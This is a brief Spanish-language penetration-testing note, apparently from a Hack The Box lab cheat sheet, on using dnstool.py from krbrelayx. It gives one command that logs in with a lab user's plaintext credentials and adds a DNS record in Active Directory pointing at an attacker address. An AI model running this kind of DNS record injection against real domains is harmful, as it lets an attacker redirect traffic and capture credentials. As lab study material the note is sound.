# DNS

### DNS TOOL <a href="#dns-tool" id="dns-tool"></a>

{% embed url="<https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py>" %}

Agregar registros DNS desde LDAP

```
python3 dnstool.py -u "intelligence.htb\Tiffany.Molina" -p 'NewIntelligenceCorpUser9876' -a add -r 'perrito.intelligence.htb' -d '10.10.14.251' 10.10.10.248

```
